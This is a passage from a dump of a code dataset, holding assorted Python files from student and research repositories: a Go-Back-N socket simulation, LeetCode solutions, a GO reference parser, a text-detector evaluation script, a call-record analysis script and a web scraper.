self.in_order(root.right)","repo_name":"Howuhh/cs_algorithms","sub_path":"leetcode/bfs_dfs/medium/isValidBST.py","file_name":"isValidBST.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"41159362585","text":"import socket\r\nimport sys\r\nimport random\r\nimport math\r\n\r\n################################## Sender.py ######################################\r\n\r\n# This is the sender portion of the \"Go-Back-N\" algorithm\r\n#\r\n# Sender will send 5 packets at a time, but they might get lost before they get to Receiver\r\n# Packet loss is simulated with \"packet_loss_chance\" (default is 30%), there is a 30% chance\r\n# that the packet N will not make it to receiver\r\n# Receiver will send back Acks in sequential order; if it receives a packet out of order it will\r\n# continue to send an Ack for the last received packet until the Sender sends the correct packet\r\n\r\n################################# Creates Socket ######################################\r\n\r\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nclient_socket.settimeout(10)\r\nHOST = \"localhost\"\r\nPORT = 8000\r\nclient_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\nclient_socket.bind((HOST, PORT))\r\nclient_socket.listen(5)\r\nconn, address = client_socket.accept()\r\n\r\n#################################### Variables ########################################\r\n\r\n# Customizable variables\r\npacket_loss_chance = 30 # Set to 0 for 0% chance of packet loss\r\nnum_packets = 10 # Total number of packets to be sent\r\nwindow_size = 5 # Window size, all packets must be ACKed before window shifts\r\nmessage = \"Hello:\" # This is the message to be sent to the Receiver\r\n\r\n# Variables for program\r\nmax_n = math.ceil(num_packets/window_size)\r\nn = 1\r\nsequence_Num = 0\r\nhighest_Ack = 
0\r\nack_Num = 0\r\ndisconnect_Msg = \"fin\"\r\nacks_Recv = 0\r\n\r\n################################ Functions ##################################\r\n\r\n# Simulates sending packets in window, with a [packet_loss_chance]% of losing a packet\r\ndef sendNPackets(sequence_Num):\r\n data = buildNPackets(sequence_Num)\r\n data = data.strip()\r\n \r\n if dataIsNotEmpty(data):\r\n #print(\"Data sent\", data)\r\n conn.send(data.encode())\r\n return True\r\n \r\n else:\r\n pass\r\n return False\r\n \r\n# Checks if data is empty\r\ndef dataIsNotEmpty(data): \r\n if (len(data) > 0):\r\n return True\r\n \r\n# Builds a string of packets to send to receiver \r\ndef buildNPackets(sequence_Num):\r\n data = \"\"\r\n for x in range(0, window_size):\r\n random_int = random.randint(1,100)\r\n \r\n # Max sequence number has been reached\r\n if (sequence_Num >= num_packets):\r\n continue\r\n \r\n # Packet is \"lost\"\r\n if (random_int < packet_loss_chance):\r\n sequence_Num += 1\r\n \r\n # Packet is not \"lost\"\r\n elif (random_int >= packet_loss_chance):\r\n data += message + str(sequence_Num) + \" | \"\r\n sequence_Num += 1 \r\n return data\r\n\r\n# Waits for Acks, will accept [window size] at a time\r\ndef waitForAcks(sequence_Num, highest_Ack, acks_Recv): \r\n for x in range(0, 5):\r\n response = conn.recv(6);\r\n \r\n if not response or response == \"\":\r\n continue \r\n \r\n else: \r\n ack_Num = getAckNum(response)\r\n evaluateAck(ack_Num) \r\n \r\n # Decide if highest Ack value needs to be updated \r\n if isNewHighestAck(ack_Num, highest_Ack):\r\n acks_Recv = acks_Recv + 1\r\n highest_Ack = ack_Num\r\n \r\n if isLastAck(ack_Num, num_packets):\r\n break\r\n \r\n sequence_Num = setNewSequenceNum(highest_Ack, acks_Recv)\r\n return sequence_Num, highest_Ack, acks_Recv\r\n\r\n# Set new Sequence Number based on highest Ack received\r\ndef setNewSequenceNum(highest_Ack, acks_Recv):\r\n if (int(acks_Recv) == 0):\r\n return 0\r\n else:\r\n return int(highest_Ack) + 1\r\n\r\n# Check if latest Ack received is the last one expected\r\ndef isLastAck(ack_Num, num_packets):\r\n if (int(ack_Num) == (num_packets - 1)):\r\n return True\r\n \r\n# Evaluate whether the latest received Ack is the highest one received \r\ndef isNewHighestAck(ack_Num, highest_Ack):\r\n if int(ack_Num) > int(highest_Ack):\r\n return True\r\n\r\n# Evaluate Ack to determine if it should be printed or not \r\ndef evaluateAck(ack_Num):\r\n # (Special Case) Hello:0 was not received\r\n if (int(ack_Num) < 0):\r\n pass\r\n \r\n elif (int(ack_Num) == highest_Ack and int(ack_Num) != 0):\r\n pass\r\n\r\n else:\r\n print (\"Ack:\",ack_Num)\r\n \r\n# Get Ack Num from response \r\ndef getAckNum(response):\r\n response = (response.decode())\r\n ack_Num = response.strip()\r\n ack_Num = response[4:].strip()\r\n return ack_Num\r\n\r\n# send disconnect message to Receiver, then close connection\r\ndef endConnection():\r\n print(\"All packets sent, closing connection.\")\r\n conn.send(disconnect_Msg.encode())\r\n \r\n################################ Beginning of Program ##################################\r\n# Sends N packets, waits for Acks, then sends next N packets based on the highest Ack received\r\n\r\nwhile sequence_Num < num_packets:\r\n try:\r\n if sendNPackets(sequence_Num) == True:\r\n sequence_Num, highest_Ack, acks_Recv = waitForAcks(sequence_Num, highest_Ack, acks_Recv) \r\n print(\"\")\r\n except socket.timeout:\r\n continue\r\nendConnection() 
\r\nclient_socket.close()","repo_name":"skurrrz/InternetTechnology_Project3","sub_path":"Go-Back-N/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1021805338","text":"\"\"\"\nhttps://leetcode.com/problems/cousins-in-binary-tree/\n993. Cousins in Binary Tree\n\nIn a binary tree, the root node is at depth 0, and children of each depth k node are at depth k+1.\nTwo nodes of a binary tree are cousins if they have the same depth, but have different parents.\nWe are given the root of a binary tree with unique values, and the values x and y of two different nodes in the tree.\nReturn true if and only if the nodes corresponding to the values x and y are cousins.\n\nExample 1:\nInput: root = [1,2,3,4], x = 4, y = 3\nOutput: false\nExample 2:\nInput: root = [1,2,3,null,4,null,5], x = 5, y = 4\nOutput: true\nExample 3:\nInput: root = [1,2,3,null,4], x = 2, y = 3\nOutput: false\n\nConstraints:\nThe number of nodes in the tree will be between 2 and 100.\nEach node has a unique integer value from 1 to 100.\n\"\"\"\n\nfrom typing import Deque\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution(object):\n #02\n def isCousins(self, root: TreeNode, x: int, y: int) -> bool:\n def dfs(node, parent, depth, mod):\n if node:\n if node.val == mod:\n return depth, parent\n return dfs(node.left, node, depth + 1, mod) or dfs(node.right, node, depth + 1, mod)\n dx, px, dy, py = dfs(root, None, 0, x) + dfs(root, None, 0, y)\n return dx == dy and px != py\n\n #01\n def isCousins1(self, root, x, y):\n \"\"\"\n :type root: TreeNode\n :type x: int\n :type y: int\n :rtype: bool\n \"\"\"\n queue = Deque([root])\n \n while queue:\n size = len(queue)\n temp = {}\n for i in range(size):\n node = queue.popleft()\n if node.left:\n queue.append(node.left)\n temp[node.left.val] = node.val\n if node.right:\n queue.append(node.right)\n temp[node.right.val] = node.val\n \n if x in temp and y in temp and temp[x] != temp[y]:\n return True\n \n return False\n\nif __name__ == \"__main__\":\n t = TreeNode(1, left=TreeNode(2, right=TreeNode(4)), right=TreeNode(3))\n x = 1\n y = 2\n print(\"isCousins({0}, {1}, {2}): {3}\".format(t, x, y, Solution.isCousins(Solution, t, x, y)))\n\n\n\n# # 01\n# Runtime: 20 ms, faster than 66.49% of Python online submissions for Cousins in Binary Tree.\n# Memory Usage: 13.4 MB, less than 62.70% of Python online submissions for Cousins in Binary Tree.\n\n#02\n# Runtime: 24 ms, faster than 35.95% of Python online submissions for Cousins in Binary Tree.\n# Memory Usage: 13.5 MB, less than 62.70% of Python online submissions for Cousins in Binary Tree.\n","repo_name":"briansu2004/MyLeet","sub_path":"Python/993. 
Cousins in Binary Tree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"41887090896","text":"from email import header\nimport os\nimport sys\nimport logging\n\nsys.path.append(\"../parser/goref.py\")\nfrom goref import GoRef\n\nsys.path.append(\"../parser/utils.py\")\nfrom utils import get_html_string, merge_dicts\n\nimport yaml\nimport markdown\n\n\nlogger = logging.getLogger(__name__)\n\nif __name__ == \"__main__\":\n # final list of all dicts that need to be converted to YAML\n combined_dict_list = []\n\n for file_name in os.listdir(\"metadata/gorefs/\"):\n if any(\n non_goref in file_name\n for non_goref in [\"README-editors.md\", \"Makefile\", \"README.md\"]\n ):\n continue\n\n file_name = os.path.join(\"metadata/gorefs/\", file_name)\n\n with open(file_name, \"r\") as file:\n data = file.read()\n\n goref = GoRef(file_name)\n\n # fetch YAML contents\n yaml_content = goref.parse(portion=\"yaml\")\n\n # fetch MD content\n md_content = goref.parse(portion=\"md\")\n\n # convert MD into HTML\n html = markdown.markdown(md_content)\n\n # get content between

<h2></h2> tags\n        header_contents = get_html_string(\"h2\", html)\n\n        # get content between <p></p>
        tags\n paragraph_contents = get_html_string(\"p\", html)\n\n # enable this block if you want to handle multiple comments differently\n # if len(header_contents) != len(paragraph_contents):\n # logger.warning(\n # f\"There are standalone headers or paragraphs in: {yaml_content['id']}\"\n # )\n # continue\n\n title_desc_pair = {}\n\n title_desc_pair[\"title\"] = header_contents[0]\n title_desc_pair[\"comments\"] = paragraph_contents\n\n # yamldown content in the form of a dictionary\n merged_yaml_md = merge_dicts(yaml_content, title_desc_pair)\n\n combined_dict_list.append(merged_yaml_md)\n\n # export combined list of yamldown dicts compiled from all gorefs\n # and export to YAML\n with open(\"gorefs.yaml\", \"w\") as outfile:\n yaml.dump_all(combined_dict_list, outfile, sort_keys=False)\n","repo_name":"geneontology/go-site","sub_path":"scripts/goref_parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"35"} +{"seq_id":"35638546503","text":"import base64\n\ndef give64String():\n image = open('subject.jpg', 'rb') # open binary file in read mode\n image_read = image.read()\n image_64_encode = base64.encodestring(image_read)\n almostRetString = str(image_64_encode)\n\n\n retString = almostRetString.replace(\"\\\\n\", \",\")\n retRetString = retString.replace(\",\", \"\")\n finString = retRetString.split(\"'\")\n\n return finString[1]\n\n","repo_name":"AmanGotchu/MakeHarvard","sub_path":"base64encode.py","file_name":"base64encode.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39117216806","text":"from transformers import AutoTokenizer, AutoModelForSequenceClassification\nimport datasets\nimport numpy as np\nfrom tqdm import tqdm\nimport torch\nfrom torch.utils.data import DataLoader\nfrom time import sleep\nimport sys\n\nmodel_name = \"andreas122001/bloomz-560m-wiki-detector\"\ndataset_name = \"wiki_labeled\"\nnum_data = None\n\n# Parses the job-name from the sbatch script for running bloomz-tuning\n# eval-rob-wiki-wiki\nif len(sys.argv) == 2:\n print(\"Using arguments from sbatch\")\n args = sys.argv[1].split(\"-\")\n if len(args) >= 3:\n model_name = \"andreas122001/\"\n if args[1] == \"rob\":\n model_name += \"roberta\"\n else:\n model_name += \"bloomz-\" + args[1]\n if args[2] == \"wiki\":\n model_name += \"-wiki-detector\"\n elif args[2] == \"abs\":\n model_name += \"-academic-detector\"\n \n dataset_name = \"research_abstracts_labeled\" if args[3] == \"abs\" else \"wiki_labeled\"\n print(\"Using arguments: \", model_name, dataset_name)\n else:\n raise Exception(\"Expected following format for input argument: 'eval-model-trainDataset-testDataset-xxx\")\n\nprint(f\"\\nModel: {model_name}\\nDataset: {dataset_name}\\n\")\n\n# Load dataset\ndataset = datasets.load_dataset(\"NicolaiSivesind/human-vs-machine\", dataset_name, split=\"test\")\nif num_data:\n dataset = dataset.select(range(num_data))\n\n# Load model and tokenizer into pipeline\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\ntokenizer = AutoTokenizer.from_pretrained(model_name, device=device)\nmodel = AutoModelForSequenceClassification.from_pretrained(model_name, num_labels=2)\nmodel.to(device)\n\n# Define predict function\ndef predict(batch):\n encoding = tokenizer(batch, return_tensors=\"pt\", padding=\"max_length\", truncation=True, max_length=512)\n encoding = {k: 
v.to(model.device) for k, v in encoding.items()}\n\n outputs = model(**encoding)\n logits = outputs.logits.squeeze()\n pred = torch.softmax(logits.cpu(), dim=-1).detach().numpy()\n\n return np.argmax(pred, -1)\n\n# Perform tests\ntrues = [0, 0] # [negatives, positives] - all true negative and positive predicions\nfalses = [0, 0] # [negatives, positives] - all false negative and positive predicions\n\nnum_prints = 50 # how many times to print intermediate results\ndataloader = DataLoader(dataset, batch_size=3)\nfor i, batch in enumerate(tqdm(dataloader)):\n\n predicted_labels = np.array([predict(batch['text'])]).reshape(-1)\n real_labels = batch['label'].detach().numpy()\n\n # Assert reals and falses for positive and negative results\n for real, pred in zip(real_labels, predicted_labels):\n if real == pred:\n trues[pred] += 1\n else:\n falses[pred] += 1\n\n if i%max(1, len(dataloader) // num_prints) == 0:\n print(\"\\n\" +str(trues),str(falses))\n\n# Print result - sleep so tqdm doesn't overwrite results\nsleep(1)\nprint(\"\\nResults: (t/f)\")\nprint(\"trues = \" + str(trues))\nprint(\"falses = \" + str(falses))\nprint()\n\nmodel_name = model_name.split(\"/\")[-1]\nprint(f\"{model_name} on {dataset_name}\")\nfor i in trues:\n print(i)\nfor i in falses:\n print(i)\n","repo_name":"IDATT2900-072/MGT-Detection","sub_path":"models/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38731971150","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom regression import Regression\nfrom sklearn.metrics import mean_squared_error as mse\n\n\nclass CrossValidation:\n\n def __init__(self, model, X, y, degree):\n self.X = X\n self.y = y\n self.degree = degree\n self.reg = Regression()\n self.model = model\n \n def rmse(self, pred, label):\n\n return np.sqrt(np.sum((pred - label) ** 2) / len(pred))\n \n def cross_val_error(self, kfold=10):\n N, D = self.X.shape\n slice_size = int(N / kfold)\n error = np.zeros(kfold)\n for i in range(kfold):\n X_train = np.delete(self.X, slice(i * (slice_size), (i+1) * (slice_size)), axis=0)\n y_train = np.delete(self.y, slice(i * (slice_size), (i+1) * (slice_size)))\n\n X_test = self.X[i * (slice_size):(i + 1) * (slice_size)]\n y_ground = self.y[i * (slice_size):(i+1) * (slice_size)] # Ground Label for test data\n if self.model == 'linear_regression':\n y_test = self.reg.linear_regression(X_train, y_train, X_test, degree=self.degree, normalized=False)\n elif self.model == 'ridge_regression':\n y_test = self.reg.ridge_regression(X_train, y_train, X_test, degree=self.degree, normalized=False)\n elif self.model == 'lasso_regression':\n y_test = self.reg.lasso_regression(X_train, y_train, X_test, degree=self.degree, normalized=False)\n\n error[i] = self.rmse(y_ground, y_test)\n\n return np.mean(error)\n \n ","repo_name":"SAAllegri/COVID-19_machine_learning_analysis","sub_path":"cross_validation.py","file_name":"cross_validation.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31792820157","text":"incorrect_symbols = ['+', '-', '.', ')', '(']\n\n\ndef normalize_number(call):\n \"\"\"Removes incorrect symbols from numbers and limits numbers length by 10 symbols\"\"\"\n for symbol in incorrect_symbols:\n call['caller'] = call['caller'].replace(symbol, '')\n call['recipient'] = call['recipient'].replace(symbol, '')\n if 'x' in 
call['caller']:\n split_list = call['caller'].split('x')\n call['caller'] = split_list[0]\n if len(call['caller']) > 10:\n call['caller'] = call['caller'][-10:]\n\n if 'x' in call['recipient']:\n split_list = call['recipient'].split('x')\n call['recipient'] = split_list[0]\n if len(call['recipient']) > 10:\n call['recipient'] = call['recipient'][-10:]\n return call\n\ncalls = []\nwith open('calls.txt', 'r') as file:\n for line in file:\n line = line.split('|')\n current_call = {}\n for i in line:\n i = i.replace('\\n', '')\n k, v = i.split(':')\n current_call[k] = v\n if int(current_call['duration_s']) > 120:\n current_call = normalize_number(current_call)\n calls.append(current_call)\nprint(*calls, sep='\\n')\nprint(len(calls))\n\ninitial_suspects = []\nwith open('suspects.txt', 'r') as file_suspects:\n for line in file_suspects:\n line = line.replace('\\n', '')\n for symbol in incorrect_symbols:\n line = line.replace(symbol, '')\n if 'x' in line:\n line = line.split('x')[0]\n if len(line) > 10:\n line = line[-10:]\n initial_suspects.append(line)\nprint(initial_suspects)\n\n\ndef iterate_suspects(list_of_initial_suspects, lap_number):\n with open('new_suspects_task3.txt', 'a') as new_suspects:\n for number in list_of_initial_suspects:\n new_suspects.write(number + '\\n')\n new_suspects.write(str(lap_number) + ' lap\\n')\n new_suspects_set = set()\n for call in calls:\n number_recipient = call['recipient']\n if number_recipient in list_of_initial_suspects:\n new_suspects_set.add(call['caller'])\n for number in new_suspects_set:\n new_suspects.write(number + '\\n')\n return new_suspects_set\n\n\nsuspects_lap1 = iterate_suspects(initial_suspects, 1)\nsuspects_lap2 = iterate_suspects(suspects_lap1, 2)\nsuspects_lap3 = iterate_suspects(suspects_lap2, 3)\nsuspects_lap4 = iterate_suspects(suspects_lap3, 4)\nsuspects_lap5 = iterate_suspects(suspects_lap4, 5)","repo_name":"AlinaZabavkina/Suspected_list","sub_path":"3_task.py","file_name":"3_task.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31843550989","text":"def maxHist(row):\n result = []\n top_val = 0\n max_area = 0\n area = 0 \n i = 0\n while (i < len(row)):\n if (len(result) == 0) or (row[result[-1]] <= row[i]):\n result.append(i)\n i += 1\n else:\n top_val = row[result.pop()]\n area = top_val * i\n\n if (len(result)):\n area = top_val * (i - result[-1] - 1)\n max_area = max(area, max_area)\n\n while (len(result)):\n top_val = row[result.pop()]\n area = top_val * i\n if (len(result)):\n area = top_val * (i - result[-1] - 1)\n\n max_area = max(area, max_area)\n\n return max_area\n\ndef maxRectangle(A):\n result = maxHist(A[0])\n for i in range(1, len(A)):\n for j in range(len(A[i])):\n if (A[i][j]):\n A[i][j] += A[i - 1][j]\n result = max(result, maxHist(A[i]))\n\n return result\n\n\nn = int(input())\nmat = []\nfor i in range(0, n):\n mat.append([0]*n)\nfor i in mat:\n print(i)\nprint()\na, b , c, d = list(map(int, input().split()))\nfor i in range(a, c+1):\n for j in range(b, d+1):\n mat[i][j] = 1\n\nfor i in mat:\n print(i)\n\narea = maxRectangle(mat)\nprint(area)\n\n","repo_name":"Gokul-raaj-5999/Programming_Coding","sub_path":"My_personal_Coding/#5_find max area in matrix.py","file_name":"#5_find max area in matrix.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25901018381","text":"import requests\r\nimport time\r\nimport 
random\r\nimport csv\r\nfrom fake_useragent import UserAgent\r\nfrom bs4 import BeautifulSoup\r\nfrom lxml import etree\r\n\r\n# 每个子标题的深度不一定都是4级,这里采用递归做深度遍历穷尽\r\ndef get_content(url, dict):\r\n try:\r\n # 本来不想加的,鉴于对方服务器稳定性差,还是加了随机等待时间,模拟用户访问\r\n time.sleep(random.randint(5, 10) * 0.1)\r\n page = session.get(url, headers=headers, timeout=10)\r\n page.encoding = 'utf-8'\r\n # print(page.status_code) 仅用于测试获取链接是否成功\r\n tree = etree.HTML(page.text)\r\n # 获取当前页面所有子标题\r\n title_list = tree.xpath('//div[@class=\"grid js-equalizer\"]//div[@class=\"js-equal grid__item grid__box\"]')\r\n # 如果有子标题,则说明当前页面为中间的子节点(非叶子节点),继续遍历他的所有子节点\r\n if len(title_list) > 0:\r\n dict['next'] = []\r\n for title in title_list:\r\n d = {} # 用来存储当前子节点,并与上一级父节点形成关联\r\n d['title'] = title.xpath('./a/h3/text()')[0]\r\n dict['next'].append(d)\r\n href = title.xpath('./a/@href')[0] # 获取下级子节点的链接,进行深度遍历\r\n if href[0] == '/': # 部分链接以//开头,部分直接是https://开头,需对前一个进行处理,否则访问失败\r\n href = 'https:' + href\r\n print(href)\r\n get_content(href, d)\r\n else:\r\n d = {}\r\n d['title'] = tree.xpath('//h1[@class=\"heading heading--overview-main\"]/text()')[0]\r\n dict['next'] = d\r\n # 把所有叶节点的标题和正文存到一个数组里,方便输出\r\n item = BeautifulSoup(page.text, \"html.parser\")\r\n title = tree.xpath('//h1[@class=\"heading heading--overview-main\"]/text()')[0]\r\n content = item.find('div', class_='document').text.replace(' ', '')\r\n a.append([title, content])\r\n except:\r\n print(\"连接超时\")\r\n\r\na = [] # 用于存储所有的叶节点标题+正文内容\r\ndict = {'title': 'home'} # 用于存储所有的子标题,用字典树形结构存储\r\nua = UserAgent() # 随机header头\r\nsession = requests.session()\r\nurl = 'https://ses.leeds.ac.uk/'\r\nheaders = {\r\n 'User-Agent': str(ua.random),\r\n 'Cookie': 'PHPSESSID=re5j7qj3pn3rtaogrrkpctc6kqdhdhnp; TEST_COOKIE_NAME=TEST_COOKIE_VALUE; NSC_QTUHSQ_XFC_QSPEVDUJPO2=ffffffff8203a06945525d5f4f58455e445a4a42378b; _gcl_au=1.1.300417691.1656833020; _ga=GA1.3.510630176.1656833020; _gid=GA1.3.1536792503.1656833020; _gat_UA-12466371-1=1',\r\n} # cookie非必须\r\nget_content(url, dict)\r\n\r\nwith open(\"corpus.csv\", \"w\", newline=\"\", encoding=\"utf-8\") as f:\r\n writer = csv.writer(f)\r\n for k in a:\r\n writer.writerow([k[0],k[1]]) # 输出所有的叶节点标题+正文内容\r\n writer.writerow([dict]) # 输出所有的字典树形结构,实测内容太多了,会被分成多个单元格,需借助在线json进一步做下整理\r\n","repo_name":"ERGOUZA1224/leeds-chatbot","sub_path":"rasa/corpus/webScraping.py","file_name":"webScraping.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"41431407802","text":"filepath= '/Users/kev/Desktop/python/Python-Crash-Course/Chapter_10/text_files/numbers.txt'\n\nwith open(filepath) as file_object:\n contents = file_object.read()\n\npi_string=''\ncount=0\nfor content in contents:\n pi_string+=content\n count +=1\nbirthday=input(\"Enter your birthday, in the form of mmddyy: \")\nif birthday in pi_string:\n print(f\"Your birth of {birthday} is in pi!\")\nelse:\n print(\"Your birthday is not in pi.\")\nbirthint=int(birthday)\nactive=True\nx=0\nwhile active:\n i=pi_string[x:x+4]\n if i !=birthint:\n i=pi_string[x:x+4] \n print(i)\n x+=1\n else:\n print(\"test\")\n active=False\n break\n\n \nprint(f\"{pi_string[:x]}\")\n","repo_name":"kevincleppe/Python-Crash-Course","sub_path":"Chapter_10/file_readerv3.py","file_name":"file_readerv3.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"41523327793","text":"from openerp.osv import osv\nfrom 
openerp.tools.translate import _\n\n\nclass account_invoice(osv.osv):\n _inherit = 'account.invoice'\n\n def split_invoice(self, cr, uid, ids):\n \"\"\"\n Split the invoice when the lines exceed the maximum set for the company\n \"\"\"\n for inv in self.browse(cr, uid, ids):\n inv_id = False\n if inv.company_id.lines_invoice < 1:\n raise osv.except_osv(\n _('Error !'),\n _('Please set an invoice lines value in:\\n'\n 'Administration->Company->Configuration->Invoice lines'))\n if inv.type in [\"out_invoice\", \"out_refund\"]:\n if len(inv.invoice_line) > inv.company_id.lines_invoice:\n lst = []\n invoice = self.read(\n cr, uid, inv.id,\n ['name', 'type', 'number', 'supplier_invoice_number',\n 'comment', 'date_due', 'partner_id',\n 'partner_contact', 'partner_insite', 'partner_ref',\n 'payment_term', 'account_id', 'currency_id',\n 'invoice_line', 'tax_line', 'journal_id', 'period_id',\n \"user_id\"])\n invoice.update({\n 'state': 'draft',\n 'number': False,\n 'invoice_line': [],\n 'tax_line': [],\n })\n # take the id part of the tuple returned for many2one\n # fields\n invoice.pop('id', None)\n for field in ('partner_id', 'account_id', 'currency_id',\n 'payment_term', 'journal_id', 'period_id',\n 'user_id'):\n invoice[field] = invoice[field] and invoice[field][0]\n\n # if hasattr(inv,'sale_ids'):\n # if self.browse(cr,uid,inv.id,context={}).sale_ids:\n # invoice.update({\n # 'sale_ids':[(6,0,[i.id for i in self.browse(\n # cr,uid,inv.id,context={}).sale_ids])]\n # })\n\n inv_id = self.create(cr, uid, invoice)\n cont = 0\n lst = inv.invoice_line\n while cont < inv.company_id.lines_invoice:\n lst.pop(0)\n cont += 1\n for il in lst:\n self.pool.get('account.invoice.line').write(\n cr, uid, il.id, {'invoice_id': inv_id})\n self.button_compute(cr, uid, [inv.id], set_total=True)\n if inv_id:\n self.button_compute(cr, uid, [inv_id], set_total=True)\n# wf_service.trg_validate(uid, 'account.invoice', inv_id,\n# 'invoice_open', cr)\n return True\n\n def action_date_assign(self, cr, uid, ids, *args):\n \"\"\" Return assigned dat\n \"\"\"\n super(account_invoice, self).action_date_assign(cr, uid, ids, *args)\n self.split_invoice(cr, uid, ids)\n return True\n\naccount_invoice()\n","repo_name":"odoo-venezuela/odoo-venezuela","sub_path":"l10n_ve_split_invoice/model/invoice.py","file_name":"invoice.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"39"} +{"seq_id":"9334793261","text":"from os.path import dirname as dn, join as jp\nfrom typing import List\n\nimport numpy as np\n\nfrom .text_normalizer import normalize\n\n\ndef preprocess_mail(mail: str) -> []:\n # 1. Preprocess mail\n words = normalize(mail)\n\n # 2. Word to indices\n word_indices = map_to_voc_indices(words)\n\n # 3. 
Features vectorize\n features = extract_features(word_indices)\n\n return features\n\n\ndef map_to_voc_indices(words: [str]) -> [int]:\n word_indices = []\n with open(jp(dn(__file__), 'data', 'dataset', 'vocab.txt')) as f:\n vocab_list = f.read().splitlines()\n for word in words:\n if word in vocab_list:\n i = vocab_list.index(word)\n word_indices.append(i)\n\n return word_indices\n\n\ndef extract_features(word_indices: [int]) -> []:\n n = 1899\n x = np.zeros(n, np.int8)\n\n for i in range(0, len(word_indices)):\n x[word_indices[i]] = 1\n\n return x\n","repo_name":"essamik/spam-classifier-python","sub_path":"spamclassifier/mail_to_features.py","file_name":"mail_to_features.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"21051572369","text":"import maya.cmds as cmds\n\n\nwinID = \"LightLinker\"\nif cmds.window(winID, exists=True):\n cmds.deleteUI(winID)\n\nmyWindow = cmds.window(winID, title = \"Light Linker\", menuBar = True, nde = True, s = True, wh =( 50, 100))\ncmds.rowColumnLayout(nc = 1)\n \ngetLightsBtn = cmds.button( label='Select light(s)', w = 250, h = 30, backgroundColor = [0.588, 0.972, 0.815], command= \"selectLights()\" )\ngetObjectsBtn = cmds.button( label='Select objects to include', w = 250, h = 30, backgroundColor = [0.7, 0.6, 0.815], command= \"selectObjectsToExclude()\" )\nlinkLightsBtn = cmds.button( label='Link lights', w = 250, h = 30, backgroundColor = [0.95, 1.0, 0.4], command= \"linkLights()\" )\n\ncloseBtn = cmds.button( label='Close', w = 150, h = 30, backgroundColor = [0.909, 0.007, 0.286],command= \"quitBtn()\" )\n\ncmds.showWindow( myWindow )\n\ndef quitBtn():\n cmds.deleteUI(myWindow)\n\ndef selectLights():\n global selectedLights\n selectedLights = cmds.ls(selection = True) \n cmds.select(cl = True)\n\ndef selectObjectsToExclude():\n global allDeselectedObjects\n global selectedObjects\n selectedObjects = cmds.ls(sl = True)\n cmds.select(all = True)\n cmds.select(selectedObjects, deselect = True)\n cmds.select(selectedLights, deselect = True)\n allDeselectedObjects = cmds.ls(sl = True)\n cmds.select(cl = True)\n \ndef linkLights():\n cmds.lightlink(b = True, light = selectedLights, object = allDeselectedObjects)\n cmds.lightlink(light = selectedLights, object = selectedObjects)\n\n","repo_name":"codey2015/Maya-Tools","sub_path":"LightLinker.py","file_name":"LightLinker.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"17417113378","text":"# The game() function in a program let's a user to play a game and returns the score as an integer.\r\n# You need to read a file \"HiScore.txt\" which is either blank or contains the previous hi-score.\r\n# So, WAP to update the highscore when games breaks the hi-score. \r\n\r\n\r\ndef game():\r\n \r\n return 94\r\n\r\n\r\nscore=game()\r\nwith open(\"D:\\Python Learning\\Chapter10_File_InputOutput\\\\hi-score.txt\") as fil:\r\n hiscore= fil.read()\r\n\r\nif hiscore==\"\":\r\n with open(\"D:\\Python Learning\\Chapter10_File_InputOutput\\\\hi-score.txt\",\"w\") as fil:\r\n fil.write(str(score))\r\n\r\nelif int(hiscore)= their k value\n loc = person[1]\n retPpl.insert(loc,person)\n \n return retPpl","repo_name":"calumbruton/Leetcode-Solutions-Python","sub_path":"406. Queue Reconstruction by Height.py","file_name":"406. 
